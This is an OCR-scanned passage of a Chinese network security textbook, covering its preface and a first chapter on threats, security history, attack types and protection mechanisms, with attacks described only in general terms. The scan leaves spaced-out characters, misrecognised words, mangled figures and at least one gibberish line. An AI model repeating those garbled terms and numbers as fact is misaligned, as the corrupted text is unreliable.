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21 世纪 是 信息 的 时 代 。 信 息 成 为 一 种 重要 的 战略 资源 ,以 Internet 为 代表 的 计算 机 网 
络 正 引起 社会 和 经 济 的 深刻 变革 , 极 大 地 改变 着 人 们 的 生活 和 工作 方式 ,Internet 已 经 成 为 
我 们 生活 和 工作 的 一 个 不 可 分 割 的 组 成 部 分 。 因 此 ,确保 计算 机 网 络 的 安全 已 经 成 为 全 球 
关注 的 社会 问题 和 通信 技术 领域 的 研究 热点 。 

本 书 融 入 了 作者 最 近 几 年 从 事 计算 机 网 络 与 信息 安全 教学 、 科 研 和 工程 经 验 的 积累 。 
全 书 内 容 面 向 市 场 需求 ,简单 易学 ,全 面 专业 ,所 有 软件 实 训 方 案 均 在 Windows Server 2003 
和 Red Hat Linux 9.0 真实 验证 ,所 有 硬件 实 训 方案 均 在 神州 数码 网 络 安全 设备 实现 。 

本 书 编写 的 方法 是 尊重 人 类 认识 事物 的 基本 规律 , 即 从 简单 到 复杂 、 从 具体 到 抽象 .从 
特殊 到 一 般 , 以 实践 为 基础 ; 认识 网 络 安全 的 基本 规律 ,网 络 安 全 问题 的 根源 是 人 为 地 利用 
技术 漏洞 ,分 析 TCP/IP 的 漏洞 .黑客 利用 漏洞 攻击 的 基本 手段 .防御 攻击 的 关键 技术 。 

本 书 共 9 章 ,第 1 章 介 绍 网 络 安全 的 根源 、 意 义 、 含 义 ,第 2 章 具体 分 析 TCP/IP 的 工作 
过 程 ,第 3 章 曾 述 黑 客 攻击 的 主要 手段 ,第 4 一 第 9 章 详 细 描 述 防 御 攻 击 的 关键 技术 。 本 书 
内 容 编 排 符合 认识 规律 ,逻辑 性 强 ; 侧重 网 络 防御 实际 技能 的 培养 , 实 训 贯 穿 每 一 章 , 内 容 
讲解 清晰 透彻 ,重要 的 知识 技能 引入 真实 的 商业 案例 。 

读者 最 好 具有 基本 的 密码 学 知识 ,作者 力荐 浙江 金融 职业 学 院 复 力 老 师 主编 的 (密码 技 
术 与 应 用 》( 高 等 教育 出 版 社 ) 和 四 川 大 学 刘 嘉 勇 教授 主编 的 《应 用 密码 学 》( 清 华 大 学 出 版 
社 )。 作 者 以 后 也 会 编写 一 本 面向 独立 学 院 、 高 职高 专 的 《现代 密码 技术 》( 清 华 大 学 出 
版 社 ) 。 

本 书 第 1 章 由 马 杰 编 写 , 第 2 一 第 6,58 8 和 第 9 章 由 李 挫 保 编写 , 第 7 章 由 何 汉 华 编 
写 。 建 议 学 时 数 为 64 一 72。 对 于 网 络 实 训 设备 不 够 的 学 校 , 建 议 采 用 思科 模拟 器 Packet 
Tracer 5. 3 进行 实 训 。 

本 书 配 有 习题 .素材 和 实 训 , 相 关内 容 可 从 清华 大 学 出 版 社 网 站 下 载 ,对 本 书 的 建议 可 
发 送 至 shbli@126. com 。 

本 书 的 出 版 得 到 了 清华 大 学 出 版 社 的 鼎力 支持 和 帮助 ,在 此 致 以 衷心 的 感谢 ! 

限于 笔者 学 识 , 不 足 之 处 ,恳请 同行 专家 批评 指正 。 
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本 章 介绍 计算 机 网 络 安全 概念 ,重点 介绍 网 络 安全 保障 体系 和 网 络 安全 关键 技术 。 


B 网 络 面临 的 威胁 


随 着 计算 机 网 络 在 军事 政治, 金融 工业、 商业 等 部 门 的 广泛 应 用 ,社会 对 计算 机 网 络 
的 依赖 性 越 来 越 大 。 以 Internet 为 代表 的 计算 机 网 络 正 引 起 社会 和 经 济 的 深刻 变革 , 极 大 
地 改变 着 人 们 的 生活 和 工作 方式 ,Internet 已 经 成 为 我 们 生活 和 工作 的 一 个 不 可 分 割 的 组 
成 部 分 。 因 此 ,确保 计算 机 网 络 的 安全 已 经 成 为 全 球 关注 的 社会 问题 和 通信 技术 领域 的 研 
近年 来 “黑客 ”入侵 已 成 为 危害 计算 机 网 络 和 信息 安全 的 经 常 性 ,多 发 性 事件 。2009 年 
月 8 日 ,美国 万 事 达 公司 宣布 ,有 黑客 侵入 了 “信用 卡 第 三 方 付款 处 理 器 ”的 网 络 系统 , 造 
成 包括 万 事 达 、Visa、AmericanExpress 和 Discover 在 内 各 种 信用 卡 多 达 4 000 多 万 用 户 的 
数据 资料 被 窃 。2009 年 11 月 10 日 ,美国 司法 部 起 诉 一 个 由 俄罗斯 和 东欧 人 组 成 的 黑客 集 
Vi ,指控 他 们 入 侵 苏 格 兰 皇家 银行 (RBS) 旗 下 信用 卡 公司 的 计算 机 网 络 ,伪造 假 卡 ,在 不 足 
2 小 时 内 ,于 全 球 至 少 280 个 城市 合共 2 100 部 提 款 机 提取 逾 900 万 美元 现金 。2009 年 
2 月 18 日 ,伊斯兰 武装 分 子 使 用 标价 仅 为 25. 95 美元 的 黑客 软件 ,成 功 侵入 美国 中 央 情 报 
局 (CIA) 的 “捕食 者 ”无 人 机 攻击 系统 。 单 价 2 000 万 美元 的 "捕食 者 无 人 机 上 搭载 有 “地狱 
火 ? 导 弹 , 经 常 在 伊拉克 、 阿 富 汗 以 及 巴基斯坦 境内 对 武装 分 子 发 动 攻击 。 
面 对 层 出 不 穷 的 网 络 威胁 ,现在 的 组 织 和 个 人 一 般 只 是 被 动 地 防御 , 即 出 现 问题 后 才 会 
上 网 下 载 相应 的 补丁 ,或 求助 于 网 络 安全 公司 。 这 样 ,只 能 解决 当前 的 危机 ,下 一 次 同样 的 
问题 随时 都 会 爆发 。 所 以 ,为 了 防 患 于 未 然 ,应 首先 了 解 网 络 威胁 的 根源 ,制定 适宜 的 安全 
措施 ,做 到 事前 主动 防御 、 事 发 灵活 控制 .事后 分 析 跟 踪 。 


(2 网 络 威胁 的 根源 


网 络 威胁 的 根源 主要 存在 于 下 列 三 个 方面 : 物理 因素 .技术 漏洞 和 人 为 攻击 。 


1. 物理 因素 
物理 因素 是 指 地 震 、 洪 水 .火灾 、 照 风 、 雷 电 等 人 类 不 可 抗拒 力量 对 计算 机 网 络 通信 设施 
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的 破坏 ,人 为 故意 纵火 的 犯罪 行为 对 计算 机 系统 的 破坏 ,电气 设备 老化 .电磁 泄漏 、 存 储 介质 
破损 ,静电 效应 ,电焊 火花 和 老鼠 咬 破 电线 导致 短路 等 对 计算 机 系统 的 破坏 。 
由 于 物理 因素 导致 的 网 络 威胁 需要 严格 的 工艺 纪律 和 管理 制度 来 解决 。 


2. 技术 漏洞 


TCP/IP 是 进行 一 切 网 上 活动 的 基础 , 它 使 不 同 的 硬件 设备 .不同 的 操作 系统 及 其 上 的 
应 用 在 不 同 的 网 络 环境 中 自由 通信 。 在 TCP/IP 模型 中 ,网 络 体系 结构 依次 分 为 网 络 接口 
层 、 网 络 层 ,传输 层 和 应 用 层 , 网 络 接口 层 主要 由 网 卡 实现 ,负责 接 人 物理 网 络 ; 网 络 层 由 路 
由 器 或 三 层 交 换 机 实现 ,负责 物理 网 络 之 间 的 寻 址 和 路 由 ; 传输 层 由 主机 中 的 应 用 进程 实 
现 , 负 责 两 个 进程 之 间 的 通信 ; 应 用 层 主要 负责 提供 网 络 应 用 服务 。 

技术 漏洞 是 指 TCP/IP 协议 漏洞 `TCP/IP 服务 漏洞 和 操作 系统 漏洞 。TCP/IP 先天 没 
有 设计 安全 机 制 , 它 被 人 侵 者 利用 ,达到 删除 ,修改 ,窃取 和 泄漏 机 密 或 敏感 信息 的 目的 。 

TCP/IP 协议 漏洞 是 指 网 络 接口 层 、 网 络 层 、 传 输 层 和 应 用 层 协 议 的 漏洞 ,如 ARP JC 
骗 .IP 欺骗 路 由 选择 欺骗 \TCP 序列 号 欺骗 \TCP 序列 号 洪 泛 攻击 等 ,相关 内 容 在 第 2 章 
详细 介绍 。 

TCP/IP 服务 漏洞 是 指 应 用 层 协 议 实现 网 络 服务 的 漏洞 ,如 Web 服务 、FTP 服务 、 
DHCP 服务 .路 由 和 远程 访问 服务 和 电子 邮件 服务 等 服务 的 漏洞 ,相关 内 容 在 第 6 章 详 细 
介绍 。 

Windows, Linux, UNIX 等 多 种 类 型 网 络 操作 系统 都 不 可 避免 地 存在 诸多 安全 隐患 ,如 
非法 存 取 ,远程 控制 ,缓冲 区 溢出 以 及 系统 后 门 等 。 从 各 个 厂商 不 断 发 布 的 系统 补丁 可 知 一 
二 ,相关 内 容 在 第 3.5 章 详 细 介绍 。 


3， 人 为 攻击 


由 于 Internet 的 开放 性 ,共享 性 以 及 新 服务 的 运用 ,网 上 资源 应 有 尽 有 ,网 民 在 享受 到 
Internet 带 来 的 无 穷 乐 趣 的 同时 ,一 些 别有用心 的 人 通过 Internet 这 个 共享 通道 做 起 了 非 
法 勾当 。 于 是 ,病毒 .蠕虫 .木马 ,欺诈 等 基于 网 络 和 系统 漏洞 的 攻击 事件 越 来 越 多 ,对 人 们 
心理 造成 严重 伤害 。 相 关 攻击 技术 内 容 在 1. 5 节 和 第 3 章 详细 介绍 。 

网 络 为 经 济 发 展 提供 了 新 的 路 径 , 经 济 发 展 与 网 络 联系 日 趋 紧密 。 了 解 网 络 经 济 的 发 
展 状况 。 认 识 网 络 安全 是 经 济 发 展 的 不 竭 动力 。 


(.à 网 络 安全 的 意义 


2010 年 7 月 21 日 , 艾 瑞 咨询 集团 发 布 中 国 网 络 经 济 市 场 监测 数据 ,2010 年 Q2 中 国 网 
络 经 济 营 收 规模 达到 389. 4 亿 元 ,同比 增长 55. 9 多, 环比 增长 13. 2765 电子 商务 和 网 络 广 
告 市 场 份额 增长 最 快 ,分 别 达到 27. 6% 和 21. 9265 搜索 引擎 市 场 份额 同比 基本 持平 。 

2010 年 10 月 26 日 , 艾 瑞 咨询 集团 发 布 中 国 网 络 经 济 市 场 监测 数据 ,2010 年 Q3 中 国 
网 络 经 济 营 收 规模 达到 416. 8 亿 元 ,同比 增长 59.9% ,环比 增长 16.3265 电子 商务 继续 保 
持 领 先 优势 ,市 场 份额 扩大 至 32.5%; 网 络 广告 市 场 份额 为 24. 1% ,与 上 季度 基本 持平 。 

2010 年 7 月 15 日 ,中 国 互联 网 络 信息 中 心 (CNNIC) 发 布 (第 26 次 中 国 互联 网 络 发 展 


状况 统计 报告 )。 报 告 数据 显示 : 2010 年 上 半年 ,有 59. 2 多 的 网 民 在 使 用 互联 网 过 程 中 遇 
到 过 病毒 或 木马 攻击 , 遇 到 该 类 不 安全 事件 的 网 民 规 模 达到 2. 5 亿 ; 30. 9% 的 网 民 账号 或 
密码 被 盗 过 ; 电子 商务 网 站 访问 者 中 89. 2% 的 人 担心 假冒 网 站 ,其 中 ,86. 9% 的 人 表示 如 果 
无 法 获得 该 网 站 进一步 的 确认 信息 ,将 会 选择 退出 交易 。 

网 络 安全 和 信任 问题 已 经 成 为 网 络 商 务 深层 次 发 展 的 最 大 制约 因素 ,互联 网 向 商务 交 
易 型 应 用 的 发 展 ,急需 建立 更 加 可 信 、 可 靠 的 网 络 环境 。 

可 信和 网 络 环 境 依托 于 网 络 安全 技术 的 支撑 ,我 们 必须 弄 明白 : 什么 是 网 络 安全 ? 黑客 
是 如 何 攻击 的 ?我 们 使 用 的 Internet 提供 安全 保障 吗 ? 深入 了 解 这 些 内 容 , 可 帮助 我 们 构 
建 可 信 的 网 络 交易 平台 ,促进 网 络 经 济 的 可 持续 发 展 。 


g 网 络 安全 的 含义 


计算 机 网 络 是 地 理 上 分 散 的 多 台 自主 计算 机 互联 的 集合 ; 计算 机 网 络 建立 的 目的 是 实 
现 计算 机 资源 的 相互 共享 ; 互联 的 计算 机 之 间 没 有 明确 的 主 从 关系 ,可 以 联网 工作 ,也 可 以 
脱 网 独立 工作 ; 联网 计算 机 之 间 的 通信 必须 遵循 共同 的 网 络 协议 ,由 通信 设备 、 通 信和 链 路 及 
网 络 软件 实现 。 为 了 保证 安全 ,需要 自主 计算 机 的 安全 ; 互联 的 安全 , 即 用 以 实现 互联 的 通 
信 设 备 .通信 链 路 ,网络 软件 、 网 络 协议 的 安全 ; 各 种 网 络 应 用 和 服务 的 安全 。 为 了 更 全 面 
地 理解 计算 机 网 络 和 信息 安全 的 内 涵 , 首 先 了 解 信息 安全 的 发 展 历程 。 


1.4.1 网 络 安全 的 发 展 历 程 
粗略 地 讲 , 可 把 信息 安全 分 成 3 个 阶段 。 
NT 


早期 ,所 有 的 资产 是 物理 的 ,重要 的 信息 也 是 物理 的 。 例 如 古代 ,文字 曾 刻 在 骨头 上 即 
甲骨 文 , 到 后 来 写 在 纸 上 ， 信息 传递 通常 由 信使 完成 ,如 果 信 使 被 敌人 武力 支持 , 报 文 的 信 
息 就 会 被 敌人 知悉 ,因此 就 产生 了 通信 安全 的 问题 ,可 见 物理 安全 是 存在 缺陷 的 。 

第 二 次 世界 大 战 期 间 ,德国 人 发 明了 一 种 称 为 Enigma 的 机 器 来 加 密 报 文 (图 1-1), 用 
于 军队 ,当时 他 们 认为 Enigma 是 不 可 破译 的 。 确 实 是 这 样 , 如 果 使 用 恰当 ,要 破译 它 非常 
困难 。 但 经 过 一 段 时 间 发 现 , 由 于 某 些 操作 员 的 使 用 差错 ,Enigma 被 破译 了 。 


公共 交换 电话 网 


加 密 信号 和 原始 的 未 加 
密 信号 都 在 电话 线 上 


图 1-1 Enigma 加 密 报 文 
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军事 通信 也 使 用 编码 技术 ,将 每 个 字 编 码 后 放 入 报 文 传输 。 在 战争 期 间 ,日 本 人 曾 用 编 
码 后 的 字 通 信 , 即 使 美国 人 截获 了 这 些 编码 也 难以 识别 该 报 文 。 在 准备 Midway 之 战 时 ,日 
本 人 曾 传送 编码 后 的 报 文 ,使 日 美 在 编码 和 破译 之 间 展 开 了 一 场 有 关 通 信安 全 的 对 抗 。 

从 以 上 两 个 事例 可 知 , 通 信安 全 的 主要 目的 是 解决 数据 传输 的 安全 问题 ,主要 的 措施 是 


2. 计算 机 安全 


1938 年 ,德国 人 康 拉 德 。 楚 泽 发 明了 运行 二 进 制 数 据 的 计算 机 ; 1985 年 ,美国 微软 公 
司 开发 出 了 Windows 操作 系统 。 从 此 ,计算 机 系统 以 指数 的 速度 发 展 ,互联 网 普及 率 迅速 
提升 ,大 部 分 信息 资产 以 电子 形式 移植 到 计算 机 上 ,人 们 用 交互 会 话 的 方式 访问 计算 机 
系统 。 

20 世纪 70 年 代 ,David Bell 和 Leonard La Padula 开发 了 一 个 安全 计算 机 的 操作 模型 ， 
该 模型 基于 政府 概念 的 各 种 级 别 分 类 信息 (一 般 、 秘 密 、 机 密 、 绝 密 ) 和 各 种 许可 级 别 。 如 果 
主体 的 许可 级 别 高 于 文件 (客体 ) 的 分 类 级 别 , 则 主体 能 访问 客体 。 如 果 主 体 的 许可 级 别 低 
于 文件 (客体 ) 的 分 类 级 别 , 则 主体 不 能 访问 客体 。 这 个 模型 的 概念 进一步 发 展 ,1983 年 , 美 
国 国防 部 提出 标准 500. 28 一 一 可 信 计 算 机 系统 评估 准则 (the trusted computing system 
evaluation criteria, TCSEC) BIEB. 

TCSEC 共 分 为 四 类 七 级 : OD 级 ,安全 保护 欠缺 级 ; OC 级 ,自主 安全 保护 级 ; @C2 
级 , 受 控 存 取保 护 级 ; @Bl 级 ,标记 安全 保护 级 ; @B2 级 ,结构 化 保护 级 ; @B3 级 ,安全 域 
保护 级 ; DAY 级 ,验证 设计 级 。 

橘 皮 书 对 每 一 级 定义 了 功能 要 求 和 保证 要 求 ,也 就 是 说 要 符合 某 一 安全 级 要 求 ,必须 既 
满足 功能 要 求 又 满足 保证 要 求 。 为 了 使 计算 机 系统 达到 相应 的 安全 要 求 , 计 算 机 厂商 要 花 
费 很 长 时 间 和 很 多 资金 。 有 时 当 产 品 通过 级 别论 证 时 ,该 产品 已 经 过 时 了 。 计 算 机 技术 发 
展 得 如 此 之 迅速 , 当 老 的 系统 取得 安全 认证 之 前 新 版 的 操作 系统 和 硬件 已 经 出 现 。 

1999 年 ,我 国 发 布 了 计算 机 信息 系统 安全 保护 等 级 划分 准则 Classified criteria for 
security protection of computer information system) 的 国家 标准 ,序号 为 GB 17859—1999, 
评估 准则 的 制定 为 我 们 评估 、 开 发 .研究 计算 机 系统 的 安全 提供 了 指导 准则 。 

计算 机 安全 的 主要 目的 是 解决 计算 机 信息 载体 及 其 运行 的 安全 问题 ,主要 措施 是 根据 
主客 体 的 安全 级 别 ,正确 实施 主体 对 客体 的 访问 控制 。 


3. 网 络 安全 


通信 安全 解决 的 是 远 距离 点 到 点 长 途 通信 的 安全 。 随 着 Internet 的 发 展 及 其 普及 应 
用 ,如 何 解 决 开放 网 络 环境 下 局 域 网 、 城 域 网 的 安全 问题 更 成 为 迫切 需要 解决 的 问题 。 

橘 皮 书 不 解决 联网 计算 机 的 安全 问题 。 为 此 ,1987 年 ,美国 国防 部 制定 了 TCSEC 的 可 
信和 网络 解释 TNI, 又 称 红皮书 。 除 了 满足 橘 皮 书 的 要 求 外 ,红皮书 还 企图 解决 计算 机 的 联 
网 环境 的 安全 问题 。 红 皮 书 主要 说 明 联 网 环境 的 安全 功能 要 求 , 较 少 阐述 保证 要 求 。 

网 络 安全 的 主要 目的 是 解决 分 布 网 络 环境 中 对 信息 载体 及 其 运行 提供 的 安全 保护 问 
题 , 主 要 措施 是 提供 完整 的 信息 安全 保障 体系 ,包括 防护 、 检 测 、 响 应 、 恢 复 。 

熟悉 信息 安全 的 发 展 历史 ,可 为 进一步 全 面 系统 认识 网 络 安全 的 本 质 打 下 基础 。 


1.4.2 网 络 安全 的 定义 


网 络 安全 是 在 分 布 网 络 环境 中 ,对 信息 载体 (处 理 载体 ,存储 载体 传输 载体 ) 和 信息 的 
处 理 , 传 输 ,存储 ,访问 提供 安全 保护 ,以 防止 数据 ,信息 内 容 或 拒绝 正常 服务 或 被 非 授权 使 
用 和 算 改 。 

维护 信息 载体 的 安全 就 要 抵抗 对 网 络 和 系统 的 安全 威胁 。 这 些 威胁 手段 有 物理 侵犯 
(机 房 侵入 ,设备 偷窃 ,废物 搜寻 ,电子 干扰 等 ). 系 统 漏洞 ( 旁 路 控制 ,程序 缺陷 等 ) 网络 入侵 
(窃听 、 截 获 , 堵 塞 等 )` 恶 意 软件 (病毒 . 肾 虫 特洛伊 木马 等 )\ 存 储 损坏 (老化 、 破 损 等 )。 为 
抵抗 对 网 络 和 系统 的 安全 威胁 ,通常 采取 的 安全 措施 包括 防火 墙 、 防 病毒 .人 侵 检 测 ,漏洞 扫 
描 , 存 储备 份 等 。 

维护 信息 自身 的 安全 就 要 抵抗 对 信息 的 安全 威胁 。 这 些 威胁 手段 有 身份 假冒 .非法 访 
问 、 信 息 泄露 ,数据 受 损 ,事后 否认 等 。 为 抵抗 对 信息 的 安全 威胁 ,通常 采取 的 安全 措施 包括 
身份 鉴别 ,访问 控制 ,数据 加 密 ,数据 验证 ,数字 签名 ,内容 过 滤 、 灾 难 恢复 等 。 

网 络 安全 具有 三 个 基本 属性 。@ 机 密 性 。 机 密 性 是 指 保证 数据 不 被 未 经 授权 的 用 户 截 
取 与 非法 使 用 , 主要 防范 措施 是 密码 技术 。 思 完整 性 。 完 整 性 是 指数 据 是 真实 可 信 的 ,其 发 
布 者 不 被 冒充 ,来 源 不 被 伪造 ,内 容 不 被 算 改 ,主要 防范 措施 是 校 验 与 认证 技术 。@@ 可 用 性 。 
可 用 性 是 指数 据 可 被 授权 用 户 正常 使 用 ,主要 防范 措施 是 确保 数据 处 于 一 个 可 靠 的 运行 状 
Sz. 

UR ACELIE REGE . EUR SER T RA B hZ., Beit f 75 5X ns hy F Et, A ER Hr 
部 署 网 络 安全 设施 ,抵抗 入侵。 


E 常见 的 网 络 攻击 


1.5.1 攻击 的 理由 


黑客 进行 攻击 可 以 分 为 以 下 几 种 原因 。Q 想 在 别人 面前 炫 粹 自己 的 技术 ,如 进入 别人 
的 计算 机 去 修改 一 个 文件 或 目录 名 。@ 窃 取 情 报 。 偷 取 竞争 对 手 硬盘 中 的 商业 文件 或 各 种 
账户 和 密码 ,窃取 商业 情报 。@@ 有 报复 心理 者 。 对 自己 在 单位 的 职位 薪水 等 不 满 ,事先 把 
病毒 程序 写 人 所 编程 序 , 并 设 定 将 来 某 时 段 或 某 条 件 下 激活 并 发 作 ,摧毁 原 单位 网 络 系统 。 
@ 金 钱 。 有 相当 一 部 分 计算 机 犯罪 与 利益 集团 洗钱 有 关系 。@ 政 治 目的 。 任 何 政治 因素 都 
会 反映 到 网 络 领域 ,如 敌对 国之 间 利 用 网 络 的 破坏 活动 ,个 人 及 组 织 对 政府 不 满 而 产生 的 破 
坏 活动 。 


1.5.2 攻击 的 分 类 


攻击 有 多 种 分 类 方法 。 从 攻击 方式 看 ,可 分 为 被 动 攻击 和 主动 攻击 。 
1. 被 动 攻击 


被 动 攻击 主要 是 收集 信息 ,数据 的 合法 用 户 对 这 种 活动 很 难 觉察 。 被 动 攻击 主要 有 嗅 
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探 \ 信 息 收 集 等 攻击 方法 。 由 于 被 动 攻击 很 难 被 发 现 ,因此 预防 很 重要 ,防止 被 动 攻击 的 主 
要 手段 是 数据 加 密 传输 。 


2. 主动 攻击 


主动 攻击 主要 包含 攻击 者 访问 所 需要 信息 的 故意 行为 。 比 如 远程 登录 到 指定 机 器 的 端 
H 25 找 出 公司 运行 的 邮件 服务 器 信息 ; 伪造 无 效 IP 地 址 去 连接 服务 器 ,使 接收 到 错误 IP 
地 址 的 系统 浪费 时 间 去 连接 那个 非法 地 址 。 主 动 攻 击 主要 有 欺骗 \ 信 息 算 改 ,拒绝 服务 攻击 
等 攻击 方法 。 主 动 攻击 很 容易 发 现 ,防范 主动 攻击 的 手段 有 数据 加 密 、 数 据 完整 性 校 验 、 数 
字 签名 和 访问 控制 等 。 


1.5.3 攻击 的 手段 
黑客 攻击 手段 眼花 练 乱 ,下面 介绍 常见 的 攻击 手段 。 
1. 电子 邮件 攻击 


电子 邮件 炸弹 是 一 种 让 人 厌烦 的 攻击 。 传 统 的 邮件 炸弹 大 多 只 是 简单 地 向 邮箱 内 扔 去 
大 量 的 垃圾 邮件 ,从 而 充满 邮箱 ,大 量 地 占用 系统 的 可 用 空间 和 资源 ,使 机 器 暂时 无 法 正常 
工作 。 如 果 是 拨号 上 网 的 用 户 利 用 PoP 来 接收 的 话 还 会 增加 连 网 时 间 ,造成 费用 和 时 间 的 
浪费 。 

2. 计算 机 病毒 


计算 机 病毒 (computer virus) 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 
者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 计 算 机 
中 毒 后 ,可 能 导致 程序 无 法 运行 \ 破 坏 文件 结构 ,破坏 硬盘 引导 扇 区 和 清除 系统 内 存 区 。 


3. 特洛伊 木马 


特洛伊 木马 是 一 个 程序 , 它 驻 留 在 目标 计算 机 中 ,可 以 随 计算 机 自动 启动 并 在 某 一 端口 
进行 侦 听 ,在 对 接收 的 数据 进行 识别 后 ,对 目标 计算 机 执行 特定 的 操作 。 木 马 ,实质 只 是 一 
个 通过 端口 进行 通信 的 网 络 客户 /服务 程序 ,是 一 种 远程 管理 工具 。 它 本 身 不 带 伤害 性 ,也 
没有 感染 力 ,所 以 不 能 称 为 病毒 (也 有 人 称 之 为 第 二 代 病 毒 ) ,但 却 常常 被 视 为 病毒 。 


4. 拒绝 服务 攻击 


攻击 者 想 办 法 让 目标 机 器 停止 正常 服务 ,是 黑客 常用 的 攻击 手段 之 一 。 其 实 ,对 网 络 带 
宽 进 行 的 消耗 性 攻击 只 是 拒绝 服务 攻击 的 一 小 部 分 ,只 要 能 够 对 目标 造成 麻烦 ,使 某 些 服务 
被 暂停 甚至 主机 死机 ,都 属于 拒绝 服务 攻击 。 拒 绝 服务 攻击 问题 是 由 于 网 络 协议 本 身 的 安 
全 缺陷 造成 的 ,从 而 拒绝 服务 攻击 也 成 了 攻击 者 的 终极 手法 。 攻 击 者 进行 拒绝 服务 攻击 , 实 
际 上 是 让 服务 器 实现 两 种 效果 : 一 是 迫使 服务 器 的 缓冲 区 满 ,不 接收 新 的 请 求 ; 二 是 使 用 
IP 欺骗 ,迫使 服务 器 把 合法 用 户 的 连接 复位 ,影响 合法 用 户 的 连接 。 


5. 口令 破解 


攻击 者 攻击 目标 时 常常 把 破译 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 或 者 确 
定 用 户 的 口令 ,他 就 能 获得 机 器 或 者 网 络 的 访问 权 ,并 能 访问 到 用 户 能 访问 到 的 任何 资源 。 
如 果 这 个 用 户 有 域 管理 员 或 Root 用 户 权 限 ,这 是 极其 危险 的 。 这 种 方法 的 前 提 是 必须 先 
得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ,获得 普通 用 户 账号 的 方法 很 多 ,如 从 电子 邮件 地 址 中 
收集 ,有 些 用 户 电 子 邮 件 地 址 常会 透露 其 在 目标 主机 上 的 账号 。 


6. 缓冲 区 溢出 攻击 


缓冲 区 溢出 是 一 种 非常 普遍 ,非常 危险 的 漏洞 ,在 各 种 操作 系统 .应 用 软件 中 广泛 存在 。 
利用 缓冲 区 溢出 攻击 ,可 以 导致 程序 运行 失败 ,系统 宕 机 、 重 新 启动 等 后 果 。 更 为 严重 的 是 ， 
可 以 利用 它 执行 非 授权 指令 ,甚至 可 以 取得 系统 特权 ,进而 进行 各 种 非法 操作 。 

为 了 有 效 防 范 信息 泄露 和 黑客 人 侵 , 需 要 构建 一 套 完整 的 安全 保障 体系 ,多 角度 全 方位 
保护 信息 载体 的 安全 和 信息 自身 的 安全 。 


(.6 网 络 安全 保障 体系 


根据 当前 的 网 络 安全 现状 ,科学 家 制定 了 可 行 的 网 络 安全 保障 体系 ,包括 网 络 安全 目标 
和 实现 目标 的 网 络 安全 机 制 。 


1.6.1 网 络 安全 目标 
网 络 安全 要 达到 以 下 目标 。 


1. 真实 性 


真实 性 包含 对 等 实体 的 身份 鉴别 和 数据 来 源 的 鉴别 。 在 网 络 通信 的 双方 A 和 也 之 间 ， 
常常 需要 对 等 的 双向 相互 鉴别 ,A 可 鉴别 对 等 方 B 的 身份 是 真实 的 ,B 可 鉴别 对 等 方 A 的 
身份 是 真实 的 。 在 网 络 通信 中 ,接收 方 对 数据 的 来 源 进行 判断 ,能 对 伪造 来 源 的 信息 予以 鉴 
别 ,确保 数据 来 源 的 真实 可 靠 。 


2. 访问 控制 


访问 控制 是 指 在 其 授权 控制 范围 内 具有 数据 访问 权限 及 操作 方式 的 控制 能 力 。 这 种 控 
制 能 力 体现 在 : 网 络 管理 员 利 用 访问 控制 表 对 不 同 用 户 访问 系统 或 网 络 上 的 数据 加 以 授 
权 , 不 同 级 别 用 户 权限 不 同 ; 一 般 情况 下 ,网 络 管理 员 级 别 最 高 ,权限 也 最 大 。 


3. 数据 保密 性 


由 于 网 络 系统 无 法 确认 是 否 有 未 经 授权 的 用 户 截取 数据 或 非法 使 用 数据 ,这 就 要 求 使 
用 某 种 手段 对 数据 进行 保密 处 理 。 数 据 保密 可 分 为 网 络 传输 保密 和 数据 存储 保密 。 对 机 密 
敏感 的 数据 使 用 加 密 技 术 , 将 明文 转化 为 密 文 ,只 有 经 过 授权 的 合法 用 户 才能 利用 密 钥 将 密 
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文 还 原 成 明文 。 反 之 ,未 经 授权 的 用 户 无 法 获得 所 需 信息 。 这 就 是 数据 的 保密 性 。 
4. 数据 完整 性 


数据 完整 性 是 指 未 经 授权 不 能 修改 数据 的 内 容 , 保 证 数据 的 一 致 性 。 在 网 络 传输 和 存 
储 过 程 中 ,系统 必须 保证 数据 不 被 算 改 .破坏 和 丢失 。 因 此 ,网 络 系 统 有 必要 采用 某 种 安全 
机 制 确认 数据 在 此 过 程 中 没有 被 修改 。 


5. 抗 否认 性 


抗 否认 性 是 指 建立 有 效 的 责任 机 制 ,防止 网 络 系统 中 合法 用 户 和 否认 其 行为 ,这 一 点 在 电 
子 商 务 中 是 极其 重要 的 。 抗 否认 包含 两 个 方面 : 数据 来 源 的 抗 否认 ,为 数据 接收 者 B 提供 
数据 的 来 源 证 据 , 使 发 送 者 A 不 能 否认 其 发 送 过 这 些 数 据 或 不 能 否认 发 送 数据 的 内 容 ; 数 
据 接 收 的 抗 否认 ,为 数据 的 发 送 者 A 提供 数据 的 交付 证 据 , 使 接收 者 B 不 能 否认 其 接收 过 
这 些 数据 或 不 能 和 否认 接收 数据 的 内 容 。 


1.6.2 网 络 安全 机 制 
网 络 安全 目标 的 实现 ,可 以 采用 以 下 安全 机 制 。 
1. 加 密 机 制 


加 密 是 网 络 安全 的 核心 技术 。 加 密 技术 不 仅 应 用 于 数据 的 存储 和 传输 的 过 程 中 ,而 且 
应 用 于 程序 的 执行 中 。 

网 络 中 的 数据 加 密 ,与 选择 的 加 密 算法 密切 相关 。 加 密 算法 可 分 为 对 称 密 钥 算法 和 非 
对 称 密 钥 算法 ,对 称 密 钥 属于 私 钥 体 制 , 即 加密 密 钥 和 解密 密 钥 相同 ,典型 算法 有 DES, 
AES; 非 对 称 密 钥 属于 公 钥 体制 ,有 两 把 密 钥 , 公 钥 加 密 , 私 钥 解密 ,典型 算法 有 RSA, 它 解 
决 了 网 络 环境 中 密 钥 的 分 发 问题 ,简化 了 密 钥 管理 。 

数据 加 密 主 要 与 选择 的 加 密 方式 有 关 , 包 括 链 路 层 点 对 点 加 密 、 网 络 层 主机 对 主机 加 
密 、 传 输 层 进程 对 进程 加 密 和 应 用 层 内 容 加 密 。 加 密 算法 除了 提供 信息 的 保密 性 之 外 ,与 其 
他 技术 如 单 向 哈 希 (Hash) 函数 结合 ,保证 数据 的 完整 性 。 


2. 访问 控制 机 制 


访问 控制 机 制 是 按 事先 确定 的 规则 防止 未 经 授权 的 用 户 或 用 户 组 非法 使 用 系统 资源 。 
当 一 个 用 户 企图 非法 访问 未 经 授权 的 资源 时 ,系统 访问 控制 机 制 将 拒绝 这 一 企图 ,并 向 审计 
